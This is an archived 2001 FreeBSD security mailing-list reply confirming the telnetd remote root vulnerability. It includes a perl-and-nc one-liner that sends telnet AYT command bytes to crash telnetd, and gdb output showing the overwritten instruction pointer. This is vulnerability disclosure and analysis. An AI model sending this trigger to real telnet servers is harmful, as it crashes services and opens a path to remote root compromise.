Skip site navigation (1)Skip section navigation (2)
Date:      Thu, 19 Jul 2001 11:03:53 +0200
From:      "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
To:        "Mike Tancsa" <mike@sentex.net>
Cc:        <security@freebsd.org>
Subject:   Re: FreeBSD remote root exploit ?
Message-ID:  <014d01c11031$bdab5a10$2001a8c0@clitoris>
References:  <5.1.0.14.0.20010719001357.03e22638@192.168.0.12>

next in thread | previous in thread | raw e-mail | index | archive | help
> Posted to bugtraq is a notice about telnetd being remotely root
> exploitable. Does anyone know if it is true ?

Yes, telnetd is vulnerable.

lagoon:venglin:~> perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c
x0 . "\r\n"' | nc localhost 23

(gdb) att 9024
Attaching to process 9024
0x28230f90 in ?? ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x5d736559 in ?? ()
(gdb) bt
#0  0x5d736559 in ?? ()
#1  0x804e9d9 in ?? ()
#2  0x804d1a1 in ?? ()
#3  0x804d6d1 in ?? ()
#4  0x804d14d in ?? ()
#5  0x8049bd3 in ?? ()


The strange %eip value is:

riget:root:/# perl -e 'printf("%c%c%c%c\n", 0x59, 0x65, 0x73, 0x5d)'
Yes]

"\r\n[Yes]\r\n" is response for IAC AYT command string.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?014d01c11031$bdab5a10$2001a8c0>